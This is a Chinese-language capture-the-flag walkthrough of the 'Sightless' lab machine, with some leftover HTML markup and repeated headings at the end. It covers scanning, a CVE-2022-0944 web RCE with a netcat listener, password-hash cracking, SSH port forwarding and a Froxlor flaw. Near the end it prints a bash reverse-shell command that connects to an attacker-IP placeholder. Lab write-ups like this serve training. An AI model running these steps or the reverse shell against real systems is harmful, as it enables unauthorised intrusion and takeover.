渗透测试实战：Sightless 靶场渗透教学文档<\/h1>

信息收集阶段<\/h2>

1. 端口扫描<\/h3>

使用nmap进行初始端口探测：<\/p>

nmap -sS -T4 <目标IP>
<\/span><\/span><\/code><\/pre>发现开放端口：<\/p>

21 (FTP)<\/li>
22 (SSH)<\/li>
80 (HTTP)<\/li>
<\/ul>
2. FTP服务检查<\/h3>
尝试FTP未授权访问：<\/p>
ftp <目标IP>
<\/span><\/span><\/code><\/pre>发现未授权访问不可行，需要进一步验证是否需要认证<\/p>
3. Web目录爆破<\/h3>
使用工具进行目录爆破（可选用dirb、gobuster等）：<\/p>
gobuster dir -u http:\/\/<目标IP> -w \/path\/to\/wordlist.txt
<\/span><\/span><\/code><\/pre>未发现有用路径，转向80端口Web应用分析<\/p>
Web应用渗透<\/h2>
1. 主页分析<\/h3>
访问http:\/\/<目标IP>，发现：<\/p>

存在数据库调用页面<\/li>
右上角有交互式菜单功能<\/li>
<\/ul>
2. 漏洞搜索<\/h3>
使用Google搜索相关CVE漏洞，发现：<\/p>

CVE-2022-0944（远程代码执行漏洞）<\/li>
<\/ul>
3. 漏洞利用<\/h3>
使用CVE-2022-0944的POC进行攻击：<\/p>

本地设置监听：<\/li>
<\/ol>
nc -lvnp 4444<\/span>
<\/span><\/span><\/code><\/pre>
执行POC攻击，获取webshell<\/li>
<\/ol>
内网渗透<\/h2>
1. 环境确认<\/h3>
发现当前环境运行在Docker容器中，检查用户：<\/p>
ls \/home
<\/span><\/span><\/code><\/pre>发现两个用户目录<\/p>
2. 密码恢复与爆破<\/h3>

从系统中恢复密码哈希<\/li>
使用hashcat或john进行爆破：<\/li>
<\/ol>
hashcat -m <hash类型> hash.txt \/path\/to\/wordlist.txt
<\/span><\/span><\/code><\/pre>成功获取用户密码<\/p>
3. SSH登录<\/h3>
使用爆破得到的密码登录SSH：<\/p>
ssh username@<目标IP>
<\/span><\/span><\/code><\/pre>成功登录后获取user.txt标志<\/p>
4. 权限检查<\/h3>
检查当前用户权限：<\/p>
sudo -l
<\/span><\/span><\/code><\/pre>发现michael用户无法运行sudo<\/p>
深入渗透<\/h2>
1. 配置文件检查<\/h3>
检查系统默认配置：<\/p>
find \/ -name "*.conf"<\/span> 2>\/dev\/null
<\/span><\/span>netstat -tulnp
<\/span><\/span><\/code><\/pre>发现8000端口服务<\/p>
2. 端口转发<\/h3>
使用SSH进行本地端口转发：<\/p>
ssh -L 8000:localhost:8000 username@<目标IP>
<\/span><\/span><\/code><\/pre>然后本地访问http:\/\/localhost:8000<\/p>
3. Chrome调试分析<\/h3>
发现Web应用使用Chrome调试：<\/p>

检查Chrome进程：<\/li>
<\/ol>
ps aux | grep chrome
<\/span><\/span><\/code><\/pre>发现使用参数--remote-debugging-port=0<\/code>（随机高端口）<\/p>

检查网络连接确定实际端口：<\/li>
<\/ol>
netstat -tulnp
<\/span><\/span><\/code><\/pre>权限提升<\/h2>
1. 发现新漏洞<\/h3>
识别系统为Froxlor服务器管理软件，存在：<\/p>

CVE-2024-34070（存储型XSS漏洞）<\/li>
影响版本：2.1.9之前<\/li>
漏洞位置：loginname参数的日志记录功能<\/li>
<\/ul>
2. 环境确认<\/h3>
检查PHP版本：<\/p>
php -v
<\/span><\/span><\/code><\/pre>发现为PHP 8.1.2<\/p>
3. PHP-FPM远程代码执行<\/h3>
发现一处功能点可执行命令：<\/p>

写入反弹shell脚本：<\/li>
<\/ol>
echo "bash -i >& \/dev\/tcp\/<攻击者IP>\/4444 0>&1"<\/span> > shell.sh
<\/span><\/span>chmod +x shell.sh
<\/span><\/span><\/code><\/pre>
执行脚本获取反弹shell<\/li>
<\/ol>
4. 获取root权限<\/h3>
成功利用漏洞获取root权限，完成渗透测试<\/p>
总结<\/h2>
本次渗透测试路径：<\/p>

信息收集 → 2. Web漏洞利用 → 3. 初始立足点 → 4. 内网横向移动 → 5. 权限提升<\/li>
<\/ol>
关键漏洞利用点：<\/p>

CVE-2022-0944（初始Web应用RCE）<\/li>
CVE-2024-34070（Froxlor存储型XSS）<\/li>
PHP-FPM远程代码执行（最终权限提升）<\/li>
<\/ul>

渗透测试实战：Sightless 靶场渗透教学文档<\/h1>

信息收集阶段<\/h2>

Web应用渗透<\/h2>

内网渗透<\/h2>

深入渗透<\/h2>

权限提升<\/h2>

4. 获取root权限<\/h3> 成功利用漏洞获取root权限，完成渗透测试<\/p>

4. 获取root权限<\/h3>
成功利用漏洞获取root权限，完成渗透测试<\/p>